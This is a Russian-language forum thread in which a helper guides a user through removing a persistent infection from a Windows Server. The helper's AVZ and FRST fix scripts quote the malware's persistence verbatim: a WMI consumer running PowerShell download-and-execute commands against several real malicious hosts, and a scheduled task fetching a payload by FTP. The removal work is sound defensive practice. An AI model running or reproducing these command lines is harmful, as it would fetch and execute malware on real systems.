Перейти к содержанию
Правила раздела

Mysa 1, Mysa 2, ok, okaa вирус меняет DNS и закрывать 445, 139 порт

ARDEV_AST

От ARDEV_AST
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

ARDEV_AST Новичок

ARDEV_AST

Опубликовано
Опубликовано

Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. 

Ссылка на комментарий
Поделиться на другие сайты
ARDEV_AST Новичок

ARDEV_AST

Опубликовано
  • Автор
Опубликовано
3 часа назад, ARDEV_AST сказал:

Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. 

 

CollectionLog-2022.10.28-12.20.zip

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано (изменено)

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Отключите на время лечения сервер от локальной сети.

Выполните скрипт в AVZ (Файл - Выполнить скрипт): 

begin
 TerminateProcessByName('C:\Windows\Inf\aspnet\lsma22.exe');
 TerminateProcessByName('c:\windows\system\msinfo.exe');
 TerminateProcessByName('c:\windows\temp\conhoy.exe');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('C:\Windows\Inf\aspnet\lsma22.exe', '');
 QuarantineFile('c:\windows\system\msinfo.exe', '');
 QuarantineFile('C:\Windows\system32\csrs.exe', '');
 QuarantineFile('C:\Windows\syswow64\csrs.exe', '');
 QuarantineFile('c:\windows\temp\conhoy.exe', '');
 DeleteSchedulerTask('MicrosoftsWindowsy');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat', '');
 DeleteFile('c:\windows\debug\item.dat', '64');
 DeleteFile('c:\windows\debug\ok.dat', '64');
 DeleteFile('C:\Windows\Inf\aspnet\lsma22.exe', '32');
 DeleteFile('c:\windows\inf\aspnet\lsma22.exe', '64');
 DeleteFile('c:\windows\system\msinfo.exe', '32');
 DeleteFile('C:\Windows\system32\csrs.exe', '');
 DeleteFile('C:\Windows\syswow64\csrs.exe', '');
 DeleteFile('c:\windows\temp\conhoy.exe', '');
 DeleteFile('c:\windows\temp\conhoy.exe', '64');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(9);
end.

 

Пожалуйста, перезагрузите компьютер вручную.

 

Закройте общие ресурсы:
 

Цитата

 

G:\DN

C:\Users

C:\Y

 

 

 

 

"Пофиксите" в HijackThis только это: 

O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')"

 

 

 

Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog.

 

Остальные компьютеры в локальной сети тоже следует пролечить, например, с помощью KVRT.

Изменено пользователем Sandor
Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Дополнительно:

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано
6 минут назад, ARDEV_AST сказал:

Нужно закрыть общий доступ?

Да, обязательно, по крайней мере на время лечения.

А также, повторю, обязательно пролечите остальные компьютеры в локальной сети.

 

 

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код: 
    Start::
CloseProcesses:
(services.exe ->) (Microl office) [Файл не подписан] C:\Windows\System\msinfo.exe
(svchost.exe ->) (www.google.com) [Файл не подписан] C:\Windows\Inf\aspnet\lsma22.exe
(winlogon.exe ->) () [Файл не подписан] C:\Windows\Temp\conhoy.exe <2>
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {0E294A8E-7728-43A7-90BF-02C6C7F4518B} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ВНИМАНИЕ
Task: {2A359626-624C-4AE5-9047-8578174BA8FF} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe [7680 2022-10-28] () [Файл не подписан] <==== ВНИМАНИЕ
Task: {B014DEA5-1368-4AD4-BA65-F4AE0E48812E} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ВНИМАНИЕ
Task: {E797E12A-39D5-4BB2-BC69-ED6EFDEBD750} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe [1709568 2022-10-28] (www.google.com) [Файл не подписан]
Task: {F52ACB45-234B-451C-816C-6027C02CA9D4} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ВНИМАНИЕ
R2 xWinWpdSrv; c:\windows\system\msinfo.exe [7277056 2022-10-28] (Microl office) [Файл не подписан]
2022-10-28 13:37 - 2022-10-28 13:37 - 000003450 _____ C:\Windows\system32\Tasks\Mysa1
2022-10-28 13:37 - 2022-10-28 13:37 - 000003446 _____ C:\Windows\system32\Tasks\ok
2022-10-28 13:37 - 2022-10-28 13:37 - 000003422 _____ C:\Windows\system32\Tasks\Mysa2
2022-10-28 13:37 - 2022-10-28 13:37 - 000003344 _____ C:\Windows\system32\Tasks\oka
2022-10-28 13:37 - 2022-10-28 13:37 - 000003332 _____ C:\Windows\system32\Tasks\MicrosoftsWindowsy
2022-10-28 00:09 - 2022-10-28 00:09 - 006466100 _____ (Microsoft Corporation) C:\Windows\SysWOW64\csrs.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"::
WMI:subscription\__EventFilter->killmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (запись имеет ещё 362 символов).]
2022-10-28 13:37 - 2022-10-28 13:37 - 004122624 _____ () [Файл не подписан] c:\windows\debug\item.dat
FirewallRules: [{E73C64F9-DA37-4D1A-8665-E8649016BFAC}] => (Block) LPort=445
FirewallRules: [{8709D4A8-BBF2-48E8-B13E-8D8CE5D3239E}] => (Block) LPort=139
End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер перезагрузите вручную.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • Erhogg
      Контроль портов
      От Erhogg
      Здравствуйте, столкнулся с проблемой: клиент V2Ray, vless nekoray не работает, если включен контроль портов. А именно 443 порта. Что делать? Добавление программы в исключения и в доверенные приложения не помогает. Помогает только исключение 443 порта из контроля. Но тогда же весь защищенный трафик не будет контролироваться и тогда какой толк от антивируса? 
    • ilyaperminov2010
      Вирус подменяет номер кошелька в буфере и закрывает всё подряд!
      От ilyaperminov2010
      Помогите, подцепил вирус, клипер какой то наверно. Началось всё с того что стал подменять номер кошелька в буфере. Когда начал разбираться то вирус стал закрывать диспетчер задач, папку ProgamData(открыл через другую прогу а в ней есть папка Avira которая не открывается и не удаляется), вкладки в браузере, браузер при поиске слова вирус и т.д.,
      Помогите что делать, какие логи откуда прислать?
    • apachexd
      Запускается regedit затем сразу закрывается, не устанавливается Riot Vanguard
      От apachexd
      нужна помощь в удалении вируса, пробовал разные способы запуска редактора реестра, сразу закрывается после запуска
      CollectionLog-2024.11.16-15.53.zip
    • Ig0r
      Бонусная программа «Накапливай баллы — меняй на лицензии и сувениры!»: правила и обсуждение
      От Ig0r
      Накапливай баллы — меняй на лицензии и сувениры!
      В клубе «Лаборатории Касперского» действует бонусная программа «Накапливай баллы — меняй на лицензии и сувениры!». Получайте баллы (BAL) за свою активность в клубе, накапливайте и меняйте их в магазине на лицензии для продуктов «Лаборатории Касперского» и эксклюзивные сувениры с символикой компании с бесплатной доставкой!
      Кто может участвовать в бонусной программе?
       
      За что и сколько баллов можно получить?


      В какие сроки начисляются баллы?

      За что баллы могут снять?

      Где можно посмотреть количество накопленных баллов и есть ли у них срок действия?

      Предусмотрены ли в магазине скидки и как их получить?

      Что делать, если очень хочется получить лицензию или сувенир, а баллов не хватает?

      Где узнать подробности о характеристиках сувениров?

      Как сделать заказ и узнать, правильно ли он оформлен?

      Где я могу проверить статус заказа?

      Сколько стоит доставка и в какие регионы и страны она возможна? Есть ли территориальные ограничения на доставку сувениров?

      Есть ли минимальный заказ?

      В каких случаях сувенир может быть заменён или не отправлен вовсе?

      Какими способами можно получить заказ?

      Какие сроки доставки заказа?

      Как правильно принять посылку и что делать, если они повреждены?

      Где ещё можно потратить баллы, кроме магазина?

      Можно ли расплатиться за заказ клабами, накопленными в рамках участия в рейтинговой системе мотивации участников клуба?

      Заключительные положения
       
    • civiero
      Вирус или нет?
      От civiero
      При просмотре видео на ютуб останавливается видео и появляется звуки костей, или слово amazing. Нужно ли волноваться по этому поводу? Антивирус ничего не выдает.
×
×
  • Создать...